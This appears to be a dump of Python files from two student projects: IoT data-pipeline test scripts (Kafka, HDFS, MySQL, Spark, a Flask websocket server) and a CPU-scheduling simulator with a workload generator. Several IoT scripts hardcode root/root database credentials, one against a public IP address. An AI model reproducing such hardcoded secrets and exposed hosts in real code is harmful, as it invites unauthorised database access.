return get_error_resp(e)
--- FILE SEPARATOR ---
from hdfs import *
client = Client('http://39.104.186.210:50070')
file_path = '/data/device-data-1527513600000/part-00001'
with client.read(file_path) as fs:
content = fs.read()
print(content)
--- FILE SEPARATOR ---
from kafka import KafkaConsumer, KafkaProducer
import json
# connect to Kafka server and pass the topic we want to consume 10.112.233.200
# msg = consumer.poll(timeout_ms=600 * 1000, max_records=1)
# msg.values()
# print(type(msg))
# print(list(msg.values()))
consumer = KafkaConsumer('deviceData',
bootstrap_servers=['kafka-service:9092'],
group_id='-2')
for msg in consumer:
print(msg)
#print (msg.value.decode('ascii'))
print(msg.value.decode('utf-8'))
#break
--- FILE SEPARATOR ---
from kafka import KafkaConsumer, KafkaProducer
import json
p = KafkaProducer(bootstrap_servers = ['kafka-service:9092'])
# Assign a topic
topic = 'deviceData'
import time
import random
a = {"deviceId": "1","tenantId": 1,"data": [{"key": "tem","ts": 1524708830000,"value": 1.00}]}
b = {"deviceId": "2","tenantId": 1,"data": [{"key": "hum","ts": 1524708830000,"value": 1.00}]}
def test():
while (True):
a["data"][0]["value"] = random.random() * 2 - 1
p.send(topic, json.dumps(a).encode())
print(json.dumps(a))
time.sleep(1)
b["data"][0]["value"] = random.random() * 2 - 1
p.send(topic, json.dumps(b).encode())
print(json.dumps(b))
if __name__ == '__main__':
test()
--- FILE SEPARATOR ---
"""
import pymysql
db = pymysql.connect('39.104.165.155', 'root', 'root', 'BUPT_IOT')
cursor = db.cursor()
sql = 'show tables'
cursor.execute(sql)
data = cursor.fetchall()
print(data)
sql = 'desc data_model'
cursor.execute(sql)
data = cursor.fetchall()
print(data)
"""
import db.mysql as mysql
db = mysql.mysql()
# da = list(db.select('show tables'))
# print(da)
# da = list(db.select('desc recent'))
# print(da)
# da = list(db.select('select * from data_model'))
# print(da)
import random
a = ['humidity', 'temperature', 'pressure', 'light', 'velocity', 'deformation']
b = ['1d', '3d', '1w', '1m']
for j in range(50):
for k in range(6):
for t in range(4):
db.insert("insert into recent_device values(2, '%s', %d, %d, %d, %f, '%s', '%s')" \
% (a[k],random.randint(100, 100000), random.randint(100, 10000000), random.randint(100, 10000000), random.random(),b[t], '2018-06-'+str(random.randint(1, 30))))
--- FILE SEPARATOR ---
from sklearn import datasets
iris = datasets.load_iris()
X = iris.data
y = iris.target
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)
def linear_model():
from sklearn.linear_model import LinearRegression
# 定义线性回归模型
model = LinearRegression(fit_intercept=True, normalize=False, copy_X=True, n_jobs=1)
"""
参数
---
fit_intercept:是否计算截距。False-模型没有截距
normalize: 当fit_intercept设置为False时,该参数将被忽略。 如果为真,则回归前的回归系数X将通过减去平均值并除以l2-范数而归一化。
n_jobs:指定线程数
"""
return model
def logitic_model():
from sklearn.linear_model import LogisticRegression
# 定义逻辑回归模型
model = LogisticRegression(penalty='l2', dual = False, tol = 0.0001, C = 1.0, \
fit_intercept = True, intercept_scaling = 1, class_weight = None,\
random_state = None, solver ='liblinear', max_iter = 100, multi_class ='ovr',\
verbose = 0, warm_start = False, n_jobs = 1)
"""参数
---
penalty:使用指定正则化项(默认:l2)
dual: n_samples > n_features取False(默认)
C:正则化强度的反,值越小正则化强度越大
n_jobs: 指定线程数
random_state:随机数生成器
fit_intercept: 是否需要常量
"""
return model
def bayes_model(model_type = 'm'):
from sklearn import naive_bayes
if model_type == 'b':
model = naive_bayes.BernoulliNB(alpha=1.0, binarize=0.0, fit_prior=True, class_prior=None)
elif model_type == 'g':
model = naive_bayes.GaussianNB() # 高斯贝叶斯
else:
model = naive_bayes.MultinomialNB(alpha=1.0, fit_prior=True, class_prior=None)
"""
文本分类问题常用MultinomialNB
参数
---
alpha:平滑参数
fit_prior:是否要学习类的先验概率;false-使用统一的先验概率
class_prior: 是否指定类的先验概率;若指定则不能根据参数调整
binarize: 二值化的阈值,若为None,则假设输入由二进制向量组成
"""
return model
def tree_model():
from sklearn import tree
model = tree.DecisionTreeClassifier(criterion='gini', max_depth = None,\
min_samples_split = 2, min_samples_leaf = 1, min_weight_fraction_leaf = 0.0,\
max_features = None, random_state = None, max_leaf_nodes = None, \
min_impurity_decrease = 0.0, min_impurity_split = None,\
class_weight = None, presort = False)
"""参数
---
criterion :特征选择准则gini/entropy
max_depth:树的最大深度,None-尽量下分
min_samples_split:分裂内部节点,所需要的最小样本树
min_samples_leaf:叶子节点所需要的最小样本数
max_features: 寻找最优分割点时的最大特征数
max_leaf_nodes:优先增长到最大叶子节点数
min_impurity_decrease:如果这种分离导致杂质的减少大于或等于这个值,则节点将被拆分。
"""
return model
def svm_model():
from sklearn.svm import SVC
model = SVC(C=1.0, kernel='rbf', gamma ='auto')
"""参数
---
C:误差项的惩罚参数C
gamma: 核相关系数。浮点数,If gamma is ‘auto’ then 1/n_features will be used instead.
"""
return model
def knn_model(model_type='cla'):
from sklearn import neighbors
# 定义kNN分类模型
if model_type == 'cla':
model = neighbors.KNeighborsClassifier(n_neighbors=5, n_jobs=1) # 分类
else:
model = neighbors.KNeighborsRegressor(n_neighbors=5, n_jobs=1) # 回归
"""参数
---
n_neighbors: 使用邻居的数目
n_jobs:并行任务数
"""
return model
def nn_test(model_type='cla'):
from sklearn.neural_network import MLPClassifier,MLPRegressor
# 定义多层感知机分类算法
if model_type == 'cla':
model = MLPClassifier(activation='relu', solver='adam', alpha=0.0001, max_iter=10000)
else:
model = MLPRegressor(activation='relu', solver='adam', alpha=0.0001, max_iter=10000)
"""参数
---
hidden_layer_sizes: 元祖
activation:激活函数
solver :优化算法{‘lbfgs’, ‘sgd’, ‘adam’}
alpha:L2惩罚(正则化项)参数。
"""
return model
def model_test(model):
model.fit(X_train, y_train)
#print(model.get_params())
#print(model.predict(X_test))
print(str(type(model)).split('\'')[-2])
print(model.score(X_train, y_train), model.score(X_test, y_test))
print()
#print(model.predict(X_test[0].reshape(1, -1)))
"""
model_test(linear_model())
model_test(logitic_model())
model_test(bayes_model('b'))
model_test(bayes_model('g'))
model_test(bayes_model('m'))
model_test(tree_model())
model_test(svm_model())
model_test(knn_model('cla'))
model_test(knn_model('reg'))
model_test(nn_test('cla'))
model_test(nn_test('reg'))
"""
import numpy as np
X = np.r_[np.random.random((5000,2)), np.random.random((5000,2))-1]
y = np.r_[np.ones(5000), np.zeros(5000)]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)
"""
model_test(linear_model())
model_test(logitic_model())
model_test(bayes_model('b'))
model_test(bayes_model('g'))
# model_test(bayes_model('m'))
model_test(tree_model())
model_test(svm_model())
model_test(knn_model('cla'))
model_test(knn_model('reg'))
model_test(nn_test('cla'))
model_test(nn_test('reg'))
"""
model = logitic_model()
model.fit(X_train, y_train)
print(model.predict([[1,2]]))
print(X_train)
print(y_train)
from sklearn.externals import joblib
joblib.dump(model, '/home/spark/model/test.pkl')
model = joblib.load('model.pkl')
"""
print(model.score(X_test, y_test))
from sklearn.model_selection import validation_curve
train_score, test_score = validation_curve(model, X, y, 'C', [0.1,0.2,0.3,0.4], cv=None, scoring=None, n_jobs=1)
print(train_score)
print(test_score)
from sklearn.model_selection import cross_val_score
print(cross_val_score(model, X, y, scoring= 'precision', cv=None, n_jobs=1))
"""
--- FILE SEPARATOR ---
from pyspark.sql import SparkSession
from pyspark.ml.recommendation import ALS
from pyspark.ml import Pipeline
def test():
spark = SparkSession \
.builder \
.appName("MovieRe") \
.getOrCreate()
#print(spark.sparkContext.getConf().getAll())
rawData = spark.sparkContext.textFile("hdfs://10.108.218.64:9000/test/ml-100k/u.data") \
.map(lambda line: line.split("\t")[0:3]) \
.map(lambda item: (int(item[0]), int(item[1]), float(item[2]))) \
.toDF(["user", "item", "rating"])
training, test = rawData.randomSplit([0.8, 0.2])
als = ALS().setMaxIter(10).setRank(50).setRegParam(0.01)
pipeline = Pipeline().setStages([als])
model = pipeline.fit(training)
ret = model.transform(test)
ret.select("user", "item", "rating", "prediction").show(100)
print('yes')
if __name__ == "__main__":
test()
--- FILE SEPARATOR ---
import pandas as pd
from sqlalchemy import create_engine
"""
engine = create_engine('mysql+pymysql://root:root@172.24.32.169:3306/BUPT_IOT')
# df = pd.DataFrame({'id':[1,None,3,None],'num':[None,34,None,89]})
# # 将新建的DataFrame储存为MySQL中的数据表,不储存index列
# df.to_sql(name='mydf', con=engine, if_exists='append',index= False)
df = pd.read_sql('mydf', engine)
print(df)
# sql = 'select * from mydf'
# sql = 'show tables'
# sql = 'desc app'
# df = pd.read_sql_query(sql, engine)
def get_tables(engine):
tables = pd.read_sql_query('show tables', engine)
for table_name in [tables.iloc[i, 0] for i in range(tables.shape[0])]:
table = {'table_name': table_name}
sql = 'desc %s' % table_name
each_table = pd.read_sql_query(sql, engine)
table['cloumns'] = [each_table.iloc[j, 0] for j in range(each_table.shape[0])]
yield table
def get_filter(cmp, value):
def _filter(x):
if cmp == '>':
return x > value
if cmp == '<':
return x < value
if cmp == '==':
return x == value
if cmp == '<=':
return x <= value
if cmp == '>=':
return x >= value
if cmp == '!=':
return x != value
if cmp == 'in':
return value in x
if cmp == 'not in':
return value not in x
return True
return _filter
#
# #过滤
# f = get_filter('=')
# df = df[f(df['id'])]
# # 删除指定列
# df.drop(['id','index'], axis=1, inplace=True)
# #去空值
# df.dropna(subset=['index', 'id', 'num'], inplace=True)
#缺失值填充
mean = df.mean()
median = df.median()
mode = df.mode().iloc[0]
print(mean['id'], median['id'], mode['id'])
df.fillna(mode, inplace=True)
#id
# df['test'] = df['id'].map(str) + '-' + df['num'].map(str)
# print(df)
# import json
# print(json.dumps(list(get_tables(engine))))
from numpy import nan as NaN
df1=pd.DataFrame([[1,2,3],[NaN,NaN,2],[NaN,NaN,NaN],[8,8,NaN]])
print(df1.fillna({0:10,1:20,2:'hah'}))
from etl.data import Data
args = {
# 'filter':[{'column':'id', 'cmp':'>=', 'value':3},
# {'column': 'num', 'cmp': '<', 'value': 89}],
#'drop':['index', 'id'],
#'dropna':['index'],
'fillna':[{'column':'index', 'value':'mean'},
{'column': 'id', 'value': 'mode'},
{'column': 'num', 'value': 10000},]}
data = Data('mydf', engine, args=args)
data.etl(target='test')
print(data.df)
"""
df = pd.DataFrame({"test":['123-456-789']})
print(df)
tmp = df['test'].str.split('-', expand=True)
rename = {i:'test_split_'+str(i) for i in tmp.columns}
tmp.rename(columns=rename, inplace=True)
print(df.join(tmp))
--- FILE SEPARATOR ---
import time
print(time.time())
print(time.localtime())
# print(time.strftime("%Y-%m-%d %H:%M:%S", time.time()))
print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(time.time()+3600)) )
"""
import json
a = '[1, 2, 3]'
print(json.loads(a))
a = [1, 2, 3]
print(json.dumps(a))
print(json.dumps({'1':1, 'a':"aaa"}))
a = ["tem", "hum"]
b = ["id1", "id2"]
c = []
for device_id, data_type in zip(b, a):
c.append({"device_id": device_id, "type": data_type})
print(json.dumps(c))
"""
"""
from kafka import KafkaConsumer, KafkaProducer
consumer = KafkaConsumer('2', bootstrap_servers = ['172.30.26.6:9092'], group_id = '-2', )
for msg in consumer:
print(msg)
#print (msg.value.decode('ascii'))
print(msg.value.decode('utf-8'))
"""
--- FILE SEPARATOR ---
import threading
import time
class MyThread(threading.Thread):
def run(self):
while(True):
time.sleep(1)
print("son running")
if __name__ == '__main__':
t = MyThread()
t.start()
print('main finished')
exit(0)
--- FILE SEPARATOR ---
from util.cmd_util import exec_cmd
from flask import Flask, request, render_template, abort
from geventwebsocket.handler import WebSocketHandler
from gevent.pywsgi import WSGIServer
import json
from kafka import KafkaConsumer
import subprocess
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/statistics', methods=['GET', 'POST'])
def statistics():
if request.environ.get('wsgi.websocket'):
ws = request.environ['wsgi.websocket']
if ws is None:
abort(404)
else:
try:
message = ws.receive()
print(message)
jar_args = json.loads(message)
args = ['spark-submit', '--class', 'edu.bupt.iot.spark.common.Statistics', '/home/spark/iot.jar']
args.append(str(jar_args.get('tenantId', '-1')))
args.append(str(jar_args.get('deviceType', '-1')))
args.append(str(jar_args.get('deviceId', '-1')))
args.append(str(jar_args.get('startTime', '-1')))
args.append(str(jar_args.get('endTime', '-1')))
consumer = KafkaConsumer(str(jar_args.get('tenantId', '-1')),
bootstrap_servers=['10.108.218.64:9092'],
group_id=str(jar_args.get('tenantId', '-1')),
enable_auto_commit=False,
auto_offset_reset='latest')
print(args)
popen = subprocess.Popen(args, stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
#print(args):
for msg in consumer:
ws.send(msg.value.decode('utf-8'))
#ws.send(str(msg))
break
except:
print('error')
return ''
@app.route('/websocket', methods=['GET', 'POST'])
def echo():
print(request.environ.get('wsgi.websocket'))
if request.environ.get('wsgi.websocket'):
ws = request.environ['wsgi.websocket']
if ws is None:
abort(404)
else:
while True:
if not ws.closed:
message = ws.receive()
print(message)
ws.send(message)
else:
break
if __name__ == '__main__':
# app.run(port=8989, host='0.0.0.0',debug=True)
app.debug=True
http_server = WSGIServer(('0.0.0.0', 8989), app, handler_class=WebSocketHandler)
http_server.serve_forever()
|
[
"/config.py",
"/etl/data.py",
"/hdfs/file.py",
"/model.py",
"/test/hdfs_test.py",
"/test/kafka_consumer_test.py",
"/test/kafka_producer_test.py",
"/test/mysql_test.py",
"/test/sklearn_test.py",
"/test/spark_test.py",
"/test/sqlalchemy_test.py",
"/test/test.py",
"/test/thread_test.py",
"/test/websocket_test.py"
] |
00ricardo/Experimental-Methods-in-Computer-Science-Project
|
#!/usr/bin/env python3
# Synopsis
# ./gen_workload.py num_procs mean_io_bursts mean_iat min_CPU max_CPU min_IO max_IO
# Description
# Generate workload for CPU scheduler simulation.
# Interarrival times follow an exponential distribution with mean lambda.
# CPU and I/O bursts
#
# Workload format: one line per process, each containing a sequence of
# floating-point numbers of even length. In each line, the first number
# represents the arrival time of the process, and the remaining numbers
# represent the length of the CPU and I/O bursts that result from running
# the process. Since the processes must start and end with a CPU burst, the
# total number of bursts must be odd (and the number of numbers in each line
# must be even).
import sys
import numpy as np
def main(num_procs,mean_io_bursts,mean_iat,min_CPU,max_CPU,min_IO,max_IO,r_seed,file_name):
f = open(file_name,"wt")
f.write('# seed = {0}\n'.format(r_seed))
f.write('# num_procs = {0}\n'.format(num_procs))
f.write('# mean_io_bursts = {0}\n'.format(mean_io_bursts))
f.write('# mean_iat = {0}\n'.format(mean_iat))
f.write('# min_CPU = {0}\n'.format(min_CPU))
f.write('# max_CPU = {0}\n'.format(max_CPU))
f.write('# min_IO = {0}\n'.format(min_IO))
f.write('# max_IO = {0}\n'.format(max_IO))
print("# file = %s" %file_name)
print("# seed = %d" % r_seed)
print("# num_procs = %d" % num_procs)
print("# mean_io_bursts = %g" % mean_io_bursts)
print("# mean_iat = %d" % mean_iat)
print("# min_CPU = %g" % min_CPU)
print("# max_CPU = %g" % max_CPU)
print("# min_IO = %g" % min_IO)
print("# max_IO = %g" % max_IO)
np.random.seed(r_seed)
t = 0.
for i in range(num_procs):
t += np.random.exponential(mean_iat)
print(t, end=' ')
f.write('{0} '.format(t))
io_bursts = np.random.poisson(mean_io_bursts) # Why Poisson? Why not?
book_play = np.random.randint(10,12)
for j in range(io_bursts):
burst = np.random.uniform(min_CPU, max_CPU)
if j > book_play and io_bursts-j>5:
burst = burst*np.random.uniform(4, 6)
print(burst, end=' ')
f.write('{0} '.format(burst))
burst = np.random.uniform(min_IO, max_IO)
print(burst, end=' ')
f.write('{0} '.format(burst))
burst = np.random.uniform(min_CPU, max_CPU)
print(burst)
f.write('{0}\n'.format(burst))
f.close()
if __name__ == "__main__":
if len(sys.argv) == 10:
num_procs = int(sys.argv[1])
mean_io_bursts = int(sys.argv[2])
mean_iat = float(sys.argv[3])
min_CPU = float(sys.argv[4])
max_CPU = float(sys.argv[5])
min_IO = float(sys.argv[6])
max_IO = float(sys.argv[7])
r_seed = int(sys.argv[8])
file_name = sys.argv[9]
main(num_procs,mean_io_bursts,mean_iat,min_CPU,max_CPU,min_IO,max_IO,r_seed,file_name)
else:
raise Exception("The number of arguments should be 9.")
--- FILE SEPARATOR ---
import gen_workload as generator
import simulator as simulator
import xlsxwriter
import time
def save2Excel(workbook,worksheet_name, file_name):
worksheet = workbook.add_worksheet(worksheet_name)
bold = workbook.add_format({'bold': True})
worksheet.write('A1', 'PID', bold)
worksheet.write('B1', 'Arrival Time', bold)
worksheet.write('C1', 'CPU Burst Time', bold)
worksheet.write('D1', 'IO Burst Time', bold)
worksheet.write('E1', 'Bursts Time', bold)
worksheet.write('F1', 'Turn Around Time', bold)
worksheet.write('G1', 'Ready Wait Time', bold)
worksheet.write('H1', 'IO Wait Time', bold)
file = open(file_name,"r")
with file as f:
#read first 3 lines that have no data
f.readline()
f.readline()
f.readline()
l = f.readline()
row = 1 #excel row
while l:
vals = [float(x) for x in l.split()]
worksheet.write(row, 0, vals[0])
worksheet.write(row, 1, vals[1])
worksheet.write(row, 2, vals[2])
worksheet.write(row, 3, vals[3])
worksheet.write(row, 4, vals[4])
worksheet.write(row, 5, vals[5])
worksheet.write(row, 6, vals[6])
worksheet.write(row, 7, vals[7])
l = f.readline()
row+=1
def parseSimulations():
fcfs_workbook = xlsxwriter.Workbook("Results/fcfs_results.xlsx")
sjf_workbook = xlsxwriter.Workbook("Results/sjf_results.xlsx")
srtf_workbook = xlsxwriter.Workbook("Results/srtf_results.xlsx")
rr5_workbook = xlsxwriter.Workbook("Results/rr5_results.xlsx")
rr10_workbook = xlsxwriter.Workbook("Results/rr10_results.xlsx")
rr15_workbook = xlsxwriter.Workbook("Results/rr15_results.xlsx")
file = open("Results/simulations.txt","r")
with file as f:
l = f.readline()
while l:
vals = [str(x) for x in l.split()]
if vals[1] == 'Results/fcfs_results.xlsx':
save2Excel(fcfs_workbook,vals[2],vals[0])
elif vals[1] == 'Results/sjf_results.xlsx':
save2Excel(sjf_workbook,vals[2],vals[0])
elif vals[1] == 'Results/srtf_results.xlsx':
save2Excel(srtf_workbook,vals[2],vals[0])
elif vals[1] == 'Results/rr5_results.xlsx':
save2Excel(rr5_workbook,vals[2],vals[0])
elif vals[1] == 'Results/rr10_results.xlsx':
save2Excel(rr10_workbook,vals[2],vals[0])
elif vals[1] == 'Results/rr15_results.xlsx':
save2Excel(rr15_workbook,vals[2],vals[0])
else:
raise ValueError("Unknown workbook")
l = f.readline()
fcfs_workbook.close()
sjf_workbook.close()
srtf_workbook.close()
rr5_workbook.close()
rr10_workbook.close()
rr15_workbook.close()
def chess_simulations():
seed = 1
num_procs = 10
mean_io_bursts = 40
mean_iat = 500
min_CPU = 4
max_CPU = 6
min_IO = 5
max_IO = 10
scheduler = 'fcfs' #"fcfs", "rr", "sjf", "srtf"
quantum = None
f = open("Results/simulations.txt","a+")
for i in range (30):
seed = i
input_file = "Workloads/seed{0}_procs{1}.txt".format(seed,num_procs)
generator.main(num_procs,mean_io_bursts,mean_iat,min_CPU,max_CPU,min_IO,max_IO,seed,input_file)
scheduler = 'fcfs'
output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed,num_procs,scheduler)
simulator.main(scheduler,quantum,input_file,output_file)
f.write("{0} {1} {2}\n".format(output_file,"Results/{0}_results.xlsx".format(scheduler),"seed{0}_procs{1}.txt".format(seed,num_procs)))
scheduler = 'sjf'
output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed,num_procs,scheduler)
simulator.main(scheduler,quantum,input_file,output_file)
f.write("{0} {1} {2}\n".format(output_file,"Results/{0}_results.xlsx".format(scheduler),"seed{0}_procs{1}.txt".format(seed,num_procs)))
scheduler = 'srtf'
output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed,num_procs,scheduler)
simulator.main(scheduler,quantum,input_file,output_file)
f.write("{0} {1} {2}\n".format(output_file,"Results/{0}_results.xlsx".format(scheduler),"seed{0}_procs{1}.txt".format(seed,num_procs)))
quantum = 5
scheduler = 'rr'
output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed,num_procs,scheduler)
simulator.main(scheduler,quantum,input_file,output_file)
f.write("{0} {1} {2}\n".format(output_file,"Results/{0}{1}_results.xlsx".format(scheduler,quantum),"seed{0}_procs{1}.txt".format(seed,num_procs)))
num_procs = 150
for i in range (30):
seed = i
input_file = "Workloads/seed{0}_procs{1}.txt".format(seed,num_procs)
generator.main(num_procs,mean_io_bursts,mean_iat,min_CPU,max_CPU,min_IO,max_IO,seed,input_file)
scheduler = 'fcfs'
output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed,num_procs,scheduler)
simulator.main(scheduler,quantum,input_file,output_file)
f.write("{0} {1} {2}\n".format(output_file,"Results/{0}_results.xlsx".format(scheduler),"seed{0}_procs{1}.txt".format(seed,num_procs)))
scheduler = 'sjf'
output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed,num_procs,scheduler)
simulator.main(scheduler,quantum,input_file,output_file)
f.write("{0} {1} {2}\n".format(output_file,"Results/{0}_results.xlsx".format(scheduler),"seed{0}_procs{1}.txt".format(seed,num_procs)))
scheduler = 'srtf'
output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed,num_procs,scheduler)
simulator.main(scheduler,quantum,input_file,output_file)
f.write("{0} {1} {2}\n".format(output_file,"Results/{0}_results.xlsx".format(scheduler),"seed{0}_procs{1}.txt".format(seed,num_procs)))
quantum = 5
scheduler = 'rr'
output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed,num_procs,scheduler)
simulator.main(scheduler,quantum,input_file,output_file)
f.write("{0} {1} {2}\n".format(output_file,"Results/{0}{1}_results.xlsx".format(scheduler,quantum),"seed{0}_procs{1}.txt".format(seed,num_procs)))
num_procs = 500
for i in range (30):
seed = i
input_file = "Workloads/seed{0}_procs{1}.txt".format(seed,num_procs)
generator.main(num_procs,mean_io_bursts,mean_iat,min_CPU,max_CPU,min_IO,max_IO,seed,input_file)
scheduler = 'fcfs'
output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed,num_procs,scheduler)
simulator.main(scheduler,quantum,input_file,output_file)
f.write("{0} {1} {2}\n".format(output_file,"Results/{0}_results.xlsx".format(scheduler),"seed{0}_procs{1}.txt".format(seed,num_procs)))
scheduler = 'sjf'
output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed,num_procs,scheduler)
simulator.main(scheduler,quantum,input_file,output_file)
f.write("{0} {1} {2}\n".format(output_file,"Results/{0}_results.xlsx".format(scheduler),"seed{0}_procs{1}.txt".format(seed,num_procs)))
scheduler = 'srtf'
output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed,num_procs,scheduler)
simulator.main(scheduler,quantum,input_file,output_file)
f.write("{0} {1} {2}\n".format(output_file,"Results/{0}_results.xlsx".format(scheduler),"seed{0}_procs{1}.txt".format(seed,num_procs)))
quantum = 5
scheduler = 'rr'
output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed,num_procs,scheduler)
simulator.main(scheduler,quantum,input_file,output_file)
f.write("{0} {1} {2}\n".format(output_file,"Results/{0}{1}_results.xlsx".format(scheduler,quantum),"seed{0}_procs{1}.txt".format(seed,num_procs)))
num_procs = 1000
for i in range (30):
seed = i
input_file = "Workloads/seed{0}_procs{1}.txt".format(seed,num_procs)
generator.main(num_procs,mean_io_bursts,mean_iat,min_CPU,max_CPU,min_IO,max_IO,seed,input_file)
scheduler = 'fcfs'
output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed,num_procs,scheduler)
simulator.main(scheduler,quantum,input_file,output_file)
f.write("{0} {1} {2}\n".format(output_file,"Results/{0}_results.xlsx".format(scheduler),"seed{0}_procs{1}.txt".format(seed,num_procs)))
scheduler = 'sjf'
output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed,num_procs,scheduler)
simulator.main(scheduler,quantum,input_file,output_file)
f.write("{0} {1} {2}\n".format(output_file,"Results/{0}_results.xlsx".format(scheduler),"seed{0}_procs{1}.txt".format(seed,num_procs)))
scheduler = 'srtf'
output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed,num_procs,scheduler)
simulator.main(scheduler,quantum,input_file,output_file)
f.write("{0} {1} {2}\n".format(output_file,"Results/{0}_results.xlsx".format(scheduler),"seed{0}_procs{1}.txt".format(seed,num_procs)))
quantum = 5
scheduler = 'rr'
output_file = "Simulations/seed{0}_procs{1}_{2}.txt".format(seed,num_procs,scheduler)
simulator.main(scheduler,quantum,input_file,output_file)
f.write("{0} {1} {2}\n".format(output_file,"Results/{0}{1}_results.xlsx".format(scheduler,quantum),"seed{0}_procs{1}.txt".format(seed,num_procs)))
f.close()
if __name__ == "__main__":
#parseSimulations()
chess_simulations()
print("DONE")
--- FILE SEPARATOR ---
#!/usr/bin/env python3
#
# Simulator for a CPU and I/O scheduling system assuming a single
# CPU and I/O. The CPU scheduler uses one of the following
# scheduling algorithms: First Come First Served (FCFS), Round Round
# (RR), Shortest Job First (SJF), and Shortest Remaining Time First
# (SRTF). Note that the last two require knowing the burst sizes in
# advance, which is not realistic in computer process scheduling. The
# I/O scheduler always follows a FCFS mechanism.
#
# Workload format: one line per process, each containing a sequence of
# floating-point numbers of even length. In each line, the first
# number represents the arrival time of the process, and the remaining
# numbers represent the length of the CPU and I/O bursts that result
# from running the process. Since the processes must start and end
# with a CPU burst, the total number of bursts must be odd (and the
# number of numbers in each line must be even).
#
# Output format: one line per process, each containing a sequence of
# numbers separated by spaces. The first number gives the process id
# (defined by the order in the workload file). The second number is
# the arrival time of the process. Then the next three numbers give
# the sum of all cpu bursts, the sum of all io bursts, and the sum all
# bursts respectively. The last three values given the Turn Around
# Time (TAT), i.e. the wall clock time, the Ready wait time, i.e. the
# time the process spent in the CPU scheduling queue ready to run, and
# the I/O wait time, i.e. the time the process spent in I/O.
import sys
import argparse
import salabim as sim
import numpy as np
def read_workload(file):
if file is None:
file = sys.stdin
else:
file = open(file, "r")
pid = 0
procs = []
with file as f:
l = f.readline()
while l:
if l[0] != "#":
vals = [float(x) for x in l.split()]
procs.append(Process(pid = pid, arrival = vals[0], bursts = vals[1:]))
pid += 1
l = f.readline()
return procs
class Process:
def __init__(self, pid, arrival, bursts):
self.pid = pid
self.arrival = arrival
self.bursts = bursts
class Simulator:
def __init__(self, processes, cpu_scheduler, quantum = None, ofile = None):
self.cpu_scheduler = cpu_scheduler
self.quantum = quantum # for round robin scheduler
if self.cpu_scheduler == "rr" and self.quantum is None:
raise ValueError("Quantum parameter is required for round robin")
if self.quantum is not None and self.quantum <= 0:
raise ValueError("Quantum parameter needs to be a positive (non-zero) value")
self.processes = processes
processes.sort(key = lambda x: x.arrival)
self.ofile = sys.stdout if ofile == None else open(ofile, "w")
print("# Cpu scheduler: %s" % self.cpu_scheduler, file = self.ofile)
print("# Quantum: %s" % self.quantum, file = self.ofile)
self.env = sim.Environment(trace = False)
self.cpu = sim.Resource("CPU", capacity = 1, preemptive = self.cpu_scheduler == "srtf")
self.io = sim.Resource("I/O", capacity = 1)
ProcessArrival(simulator = self)
def __del__(self):
if self.ofile != sys.stdout:
self.ofile.close()
def run(self):
print("pid arrival_time cpu_bursts_time io_bursts_time bursts_time tat ready_wait_time io_wait_time", file = self.ofile)
self.env.run()
class ProcessArrival(sim.Component):
def setup(self, simulator):
self.simulator = simulator
def process(self):
for p in self.simulator.processes:
yield self.hold(till = p.arrival)
ProcessComponent(simulator = self.simulator, pid = p.pid, arrival = p.arrival, bursts = p.bursts)
class ProcessComponent(sim.Component):
def setup(self, simulator, pid, arrival, bursts):
self.simulator = simulator
self.pid = pid
self.arrival = arrival
self.bursts = bursts
self.ready_wait_time = 0
self.io_wait_time = 0
def process(self):
b = self.bursts
clock_start = self.simulator.env.now()
for i in range(1, len(b), 2):
yield from self.__schedule_cpu_burst(b[i-1])
yield from self.__schedule_io_burst(b[i])
yield from self.__schedule_cpu_burst(b[-1])
tat = self.simulator.env.now() - clock_start
print(self.pid, end = " ", file = self.simulator.ofile)
print(self.arrival, end = " ", file = self.simulator.ofile)
print(np.sum(b[0:len(b):2]), end = " ", file = self.simulator.ofile)
print(np.sum(b[1:len(b):2]), end = " ", file = self.simulator.ofile)
print(np.sum(b), end = " ", file = self.simulator.ofile)
print(tat, end = " ", file = self.simulator.ofile)
print(self.ready_wait_time, end = " ", file = self.simulator.ofile)
print(self.io_wait_time, end = "\n", file = self.simulator.ofile)
def __schedule_cpu_burst(self, burst):
if self.simulator.cpu_scheduler == "fcfs":
yield from self.__queue_cpu(self.simulator.cpu)
yield self.hold(duration = burst)
self.release(self.simulator.cpu)
elif self.simulator.cpu_scheduler == "rr":
s = burst
while s > self.simulator.quantum:
yield from self.__queue_cpu(self.simulator.cpu)
yield self.hold(duration = self.simulator.quantum)
self.release(self.simulator.cpu)
s -= self.simulator.quantum
yield from self.__queue_cpu(self.simulator.cpu)
yield self.hold(duration = s)
self.release(self.simulator.cpu)
elif self.simulator.cpu_scheduler == "sjf":
yield from self.__queue_cpu((self.simulator.cpu, 1, burst))
yield self.hold(duration = burst)
self.release(self.simulator.cpu)
elif self.simulator.cpu_scheduler == "srtf":
s = burst
while True:
yield from self.__queue_cpu((self.simulator.cpu, 1, s))
yield self.hold(duration = s, mode = "")
if not self.isbumped():
break
s -= self.simulator.env.now() - self.mode_time()
yield self.standby()
self.release(self.simulator.cpu)
else:
raise ValueError("Unknown cpu_scheduler")
def __queue_cpu(self, arg):
ready_wait_start = self.simulator.env.now()
yield self.request(arg)
self.ready_wait_time += self.simulator.env.now() - ready_wait_start
def __schedule_io_burst(self, burst):
io_start = self.simulator.env.now()
yield self.request(self.simulator.io)
yield self.hold(duration = burst)
self.release(self.simulator.io)
